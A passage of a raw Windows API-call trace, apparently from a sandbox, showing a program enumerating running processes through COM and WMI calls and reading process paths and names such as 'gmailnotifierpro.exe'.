riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e7fc | out: ppvObject=0x19e7fc*=0x0) returned 0x80004002 [0265.175] IUnknown:QueryInterface (in: This=0x55203f8, riid=0x6c04fb20*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19e61c | out: ppvObject=0x19e61c*=0x0) returned 0x80004002 [0265.175] IUnknown:QueryInterface (in: This=0x55203f8, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e3f4 | out: ppvObject=0x19e3f4*=0x0) returned 0x80004002 [0265.175] IUnknown:AddRef (This=0x55203f8) returned 0x3 [0265.175] IUnknown:QueryInterface (in: This=0x55203f8, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e15c | out: ppvObject=0x19e15c*=0x0) returned 0x80004002 [0265.175] IUnknown:QueryInterface (in: This=0x55203f8, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e10c | out: ppvObject=0x19e10c*=0x0) returned 0x80004002 [0265.175] IUnknown:QueryInterface (in: This=0x55203f8, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e118 | out: ppvObject=0x19e118*=0x55203fc) returned 0x0 [0265.175] IMarshal:GetUnmarshalClass (in: This=0x55203fc, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e120 | out: pCid=0x19e120*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0265.175] IUnknown:Release (This=0x55203fc) returned 0x3 [0265.175] CoGetContextToken (in: pToken=0x19e178 | out: pToken=0x19e178) returned 0x0 [0265.175] CoGetContextToken (in: pToken=0x19e580 | out: pToken=0x19e580) returned 0x0 [0265.175] IUnknown:QueryInterface (in: This=0x55203f8, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e610 | out: ppvObject=0x19e610*=0x0) returned 0x80004002 [0265.175] IUnknown:Release (This=0x55203f8) returned 0x2 [0265.175] CoGetContextToken (in: pToken=0x19eb50 | out: pToken=0x19eb50) returned 0x0 [0265.176] CoGetContextToken (in: pToken=0x19eab0 | out: pToken=0x19eab0) returned 0x0 [0265.176] IUnknown:QueryInterface (in: This=0x55203f8, riid=0x19eb80*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x19eb7c | out: ppvObject=0x19eb7c*=0x55203f8) returned 0x0 [0265.176] IUnknown:AddRef (This=0x55203f8) returned 0x4 [0265.176] IUnknown:Release (This=0x55203f8) returned 0x3 [0265.176] IUnknown:Release (This=0x55203f8) returned 0x2 [0265.176] CoTaskMemFree (pv=0x54ba398) [0265.176] CoGetContextToken (in: pToken=0x19eeb8 | out: pToken=0x19eeb8) returned 0x0 [0265.176] IUnknown:AddRef (This=0x55203f8) returned 0x3 [0265.176] IWbemClassObject:Get (in: This=0x55203f8, wszName="__GENUS", lFlags=0, pVal=0x19f1cc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f24c*=0, plFlavor=0x19f248*=0 | out: pVal=0x19f1cc*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x19f24c*=3, plFlavor=0x19f248*=64) returned 0x0 [0265.176] IWbemClassObject:Get (in: This=0x55203f8, wszName="__PATH", lFlags=0, pVal=0x19f1b0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f234*=0, plFlavor=0x19f230*=0 | out: pVal=0x19f1b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"1636\"", varVal2=0x0), pType=0x19f234*=8, plFlavor=0x19f230*=64) returned 0x0 [0265.176] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"1636\"") returned 0x5e [0265.176] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"1636\"") returned 0x5e [0265.176] CoGetObjectContext (in: riid=0x2232ee0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19f1dc | out: ppv=0x19f1dc*=0x601a94) returned 0x0 [0265.177] IComThreadingInfo:GetCurrentApartmentType (in: This=0x601a94, pAptType=0x19f1d4 | out: pAptType=0x19f1d4*=1) returned 0x0 [0265.177] IUnknown:QueryInterface (in: This=0x601a94, riid=0x2232ec8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x19f1d8 | out: ppvObject=0x19f1d8*=0x0) returned 0x80004002 [0265.177] IUnknown:Release (This=0x601a94) returned 0x1 [0265.177] CoGetClassObject (in: rclsid=0x6be02c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x6bfc54e0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19eb48 | out: ppv=0x19eb48*=0x54ba2c8) returned 0x0 [0265.178] WbemDefPath:IUnknown:QueryInterface (in: This=0x54ba2c8, riid=0x6bf795e0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19ed60 | out: ppvObject=0x19ed60*=0x0) returned 0x80004002 [0265.178] WbemDefPath:IClassFactory:CreateInstance (in: This=0x54ba2c8, pUnkOuter=0x0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ed74 | out: ppvObject=0x19ed74*=0x55155a8) returned 0x0 [0265.178] WbemDefPath:IUnknown:Release (This=0x54ba2c8) returned 0x0 [0265.178] WbemDefPath:IUnknown:QueryInterface (in: This=0x55155a8, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e994 | out: ppvObject=0x19e994*=0x55155a8) returned 0x0 [0265.178] WbemDefPath:IUnknown:QueryInterface (in: This=0x55155a8, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e950 | out: ppvObject=0x19e950*=0x0) returned 0x80004002 [0265.178] WbemDefPath:IUnknown:QueryInterface (in: This=0x55155a8, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e544 | out: ppvObject=0x19e544*=0x0) returned 0x80004002 [0265.178] WbemDefPath:IUnknown:AddRef (This=0x55155a8) returned 0x3 [0265.178] WbemDefPath:IUnknown:QueryInterface (in: This=0x55155a8, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e2ac | out: ppvObject=0x19e2ac*=0x0) returned 0x80004002 [0265.178] WbemDefPath:IUnknown:QueryInterface (in: This=0x55155a8, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e25c | out: ppvObject=0x19e25c*=0x0) returned 0x80004002 [0265.179] WbemDefPath:IUnknown:QueryInterface (in: This=0x55155a8, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e268 | out: ppvObject=0x19e268*=0x5523470) returned 0x0 [0265.179] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5523470, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e270 | out: pCid=0x19e270*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0265.179] WbemDefPath:IUnknown:Release (This=0x5523470) returned 0x3 [0265.179] CoGetContextToken (in: pToken=0x19e2c8 | out: pToken=0x19e2c8) returned 0x0 [0265.179] CoGetContextToken (in: pToken=0x19e6d0 | out: pToken=0x19e6d0) returned 0x0 [0265.179] WbemDefPath:IUnknown:QueryInterface (in: This=0x55155a8, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e760 | out: ppvObject=0x19e760*=0x0) returned 0x80004002 [0265.179] WbemDefPath:IUnknown:Release (This=0x55155a8) returned 0x2 [0265.179] WbemDefPath:IUnknown:Release (This=0x55155a8) returned 0x1 [0265.179] CoGetContextToken (in: pToken=0x19f058 | out: pToken=0x19f058) returned 0x0 [0265.179] CoGetContextToken (in: pToken=0x19efb8 | out: pToken=0x19efb8) returned 0x0 [0265.179] WbemDefPath:IUnknown:QueryInterface (in: This=0x55155a8, riid=0x19f088*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x19f084 | out: ppvObject=0x19f084*=0x55155a8) returned 0x0 [0265.179] WbemDefPath:IUnknown:AddRef (This=0x55155a8) returned 0x3 [0265.179] WbemDefPath:IUnknown:Release (This=0x55155a8) returned 0x2 [0265.179] WbemDefPath:IWbemPath:SetText (This=0x55155a8, uMode=0x4, pszPath="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"1636\"") returned 0x0 [0265.180] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f208 | out: puCount=0x19f208*=0x2) returned 0x0 [0265.180] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0x0, pszText=0x0 | out: puBuffLength=0x19f204*=0xf, pszText=0x0) returned 0x0 [0265.180] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f204*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0265.180] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f1d4 | out: puCount=0x19f1d4*=0x2) returned 0x0 [0265.180] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0x0, pszText=0x0 | out: puBuffLength=0x19f1d0*=0xf, pszText=0x0) returned 0x0 [0265.180] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f1d0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0265.180] IWbemClassObject:Get (in: This=0x55203f8, wszName="Name", lFlags=0, pVal=0x19f1d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23d92a8*=0, plFlavor=0x23d92ac*=0 | out: pVal=0x19f1d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="gmailnotifierpro.exe", varVal2=0x0), pType=0x23d92a8*=8, plFlavor=0x23d92ac*=0) returned 0x0 [0265.180] SysStringByteLen (bstr="gmailnotifierpro.exe") returned 0x28 [0265.180] SysStringByteLen (bstr="gmailnotifierpro.exe") returned 0x28 [0265.180] IWbemClassObject:Get (in: This=0x55203f8, wszName="Name", lFlags=0, pVal=0x19f1d8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23d92a8*=8, plFlavor=0x23d92ac*=0 | out: pVal=0x19f1d8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="gmailnotifierpro.exe", varVal2=0x0), pType=0x23d92a8*=8, plFlavor=0x23d92ac*=0) returned 0x0 [0265.180] SysStringByteLen (bstr="gmailnotifierpro.exe") returned 0x28 [0265.180] SysStringByteLen (bstr="gmailnotifierpro.exe") returned 0x28 [0265.181] CoTaskMemAlloc (cb=0x4) returned 0x54ba398 [0265.181] IEnumWbemClassObject:Next (in: This=0x663848, lTimeout=-1, uCount=0x1, apObjects=0x54ba398, puReturned=0x23c1fd0 | out: apObjects=0x54ba398*=0x551f408, puReturned=0x23c1fd0*=0x1) returned 0x0 [0265.183] IUnknown:QueryInterface (in: This=0x551f408, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e840 | out: ppvObject=0x19e840*=0x551f408) returned 0x0 [0265.183] IUnknown:QueryInterface (in: This=0x551f408, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e7fc | out: ppvObject=0x19e7fc*=0x0) returned 0x80004002 [0265.183] IUnknown:QueryInterface (in: This=0x551f408, riid=0x6c04fb20*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19e61c | out: ppvObject=0x19e61c*=0x0) returned 0x80004002 [0265.183] IUnknown:QueryInterface (in: This=0x551f408, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e3f4 | out: ppvObject=0x19e3f4*=0x0) returned 0x80004002 [0265.183] IUnknown:AddRef (This=0x551f408) returned 0x3 [0265.183] IUnknown:QueryInterface (in: This=0x551f408, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e15c | out: ppvObject=0x19e15c*=0x0) returned 0x80004002 [0265.183] IUnknown:QueryInterface (in: This=0x551f408, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e10c | out: ppvObject=0x19e10c*=0x0) returned 0x80004002 [0265.183] IUnknown:QueryInterface (in: This=0x551f408, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e118 | out: ppvObject=0x19e118*=0x551f40c) returned 0x0 [0265.183] IMarshal:GetUnmarshalClass (in: This=0x551f40c, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e120 | out: pCid=0x19e120*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0265.183] IUnknown:Release (This=0x551f40c) returned 0x3 [0265.183] CoGetContextToken (in: pToken=0x19e178 | out: pToken=0x19e178) returned 0x0 [0265.183] CoGetContextToken (in: pToken=0x19e580 | out: pToken=0x19e580) returned 0x0 [0265.184] IUnknown:QueryInterface (in: This=0x551f408, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e610 | out: ppvObject=0x19e610*=0x0) returned 0x80004002 [0265.184] IUnknown:Release (This=0x551f408) returned 0x2 [0265.184] CoGetContextToken (in: pToken=0x19eb50 | out: pToken=0x19eb50) returned 0x0 [0265.184] CoGetContextToken (in: pToken=0x19eab0 | out: pToken=0x19eab0) returned 0x0 [0265.184] IUnknown:QueryInterface (in: This=0x551f408, riid=0x19eb80*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x19eb7c | out: ppvObject=0x19eb7c*=0x551f408) returned 0x0 [0265.184] IUnknown:AddRef (This=0x551f408) returned 0x4 [0265.184] IUnknown:Release (This=0x551f408) returned 0x3 [0265.184] IUnknown:Release (This=0x551f408) returned 0x2 [0265.184] CoTaskMemFree (pv=0x54ba398) [0265.184] CoGetContextToken (in: pToken=0x19eeb8 | out: pToken=0x19eeb8) returned 0x0 [0265.184] IUnknown:AddRef (This=0x551f408) returned 0x3 [0265.184] IWbemClassObject:Get (in: This=0x551f408, wszName="__GENUS", lFlags=0, pVal=0x19f1cc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f24c*=0, plFlavor=0x19f248*=0 | out: pVal=0x19f1cc*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x19f24c*=3, plFlavor=0x19f248*=64) returned 0x0 [0265.184] IWbemClassObject:Get (in: This=0x551f408, wszName="__PATH", lFlags=0, pVal=0x19f1b0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f234*=0, plFlavor=0x19f230*=0 | out: pVal=0x19f1b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"3664\"", varVal2=0x0), pType=0x19f234*=8, plFlavor=0x19f230*=64) returned 0x0 [0265.184] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"3664\"") returned 0x5e [0265.185] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"3664\"") returned 0x5e [0265.185] CoGetObjectContext (in: riid=0x2232ee0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19f1dc | out: ppv=0x19f1dc*=0x601a94) returned 0x0 [0265.185] IComThreadingInfo:GetCurrentApartmentType (in: This=0x601a94, pAptType=0x19f1d4 | out: pAptType=0x19f1d4*=1) returned 0x0 [0265.185] IUnknown:QueryInterface (in: This=0x601a94, riid=0x2232ec8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x19f1d8 | out: ppvObject=0x19f1d8*=0x0) returned 0x80004002 [0265.185] IUnknown:Release (This=0x601a94) returned 0x1 [0265.186] CoGetClassObject (in: rclsid=0x6be02c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x6bfc54e0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19eb48 | out: ppv=0x19eb48*=0x54ba2c8) returned 0x0 [0265.186] WbemDefPath:IUnknown:QueryInterface (in: This=0x54ba2c8, riid=0x6bf795e0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19ed60 | out: ppvObject=0x19ed60*=0x0) returned 0x80004002 [0265.186] WbemDefPath:IClassFactory:CreateInstance (in: This=0x54ba2c8, pUnkOuter=0x0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ed74 | out: ppvObject=0x19ed74*=0x5515618) returned 0x0 [0265.186] WbemDefPath:IUnknown:Release (This=0x54ba2c8) returned 0x0 [0265.186] WbemDefPath:IUnknown:QueryInterface (in: This=0x5515618, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e994 | out: ppvObject=0x19e994*=0x5515618) returned 0x0 [0265.186] WbemDefPath:IUnknown:QueryInterface (in: This=0x5515618, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e950 | out: ppvObject=0x19e950*=0x0) returned 0x80004002 [0265.186] WbemDefPath:IUnknown:QueryInterface (in: This=0x5515618, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e544 | out: ppvObject=0x19e544*=0x0) returned 0x80004002 [0265.187] WbemDefPath:IUnknown:AddRef (This=0x5515618) returned 0x3 [0265.187] WbemDefPath:IUnknown:QueryInterface (in: This=0x5515618, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e2ac | out: ppvObject=0x19e2ac*=0x0) returned 0x80004002 [0265.187] WbemDefPath:IUnknown:QueryInterface (in: This=0x5515618, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e25c | out: ppvObject=0x19e25c*=0x0) returned 0x80004002 [0265.187] WbemDefPath:IUnknown:QueryInterface (in: This=0x5515618, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e268 | out: ppvObject=0x19e268*=0x5523380) returned 0x0 [0265.187] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5523380, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e270 | out: pCid=0x19e270*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0265.187] WbemDefPath:IUnknown:Release (This=0x5523380) returned 0x3 [0265.187] CoGetContextToken (in: pToken=0x19e2c8 | out: pToken=0x19e2c8) returned 0x0 [0265.187] CoGetContextToken (in: pToken=0x19e6d0 | out: pToken=0x19e6d0) returned 0x0 [0265.187] WbemDefPath:IUnknown:QueryInterface (in: This=0x5515618, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e760 | out: ppvObject=0x19e760*=0x0) returned 0x80004002 [0265.187] WbemDefPath:IUnknown:Release (This=0x5515618) returned 0x2 [0265.187] WbemDefPath:IUnknown:Release (This=0x5515618) returned 0x1 [0265.187] CoGetContextToken (in: pToken=0x19f058 | out: pToken=0x19f058) returned 0x0 [0265.187] CoGetContextToken (in: pToken=0x19efb8 | out: pToken=0x19efb8) returned 0x0 [0265.187] WbemDefPath:IUnknown:QueryInterface (in: This=0x5515618, riid=0x19f088*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x19f084 | out: ppvObject=0x19f084*=0x5515618) returned 0x0 [0265.187] WbemDefPath:IUnknown:AddRef (This=0x5515618) returned 0x3 [0265.187] WbemDefPath:IUnknown:Release (This=0x5515618) returned 0x2 [0265.188] WbemDefPath:IWbemPath:SetText (This=0x5515618, uMode=0x4, pszPath="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"3664\"") returned 0x0 [0265.190] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f208 | out: puCount=0x19f208*=0x2) returned 0x0 [0265.190] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0x0, pszText=0x0 | out: puBuffLength=0x19f204*=0xf, pszText=0x0) returned 0x0 [0265.190] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f204*=0xf, 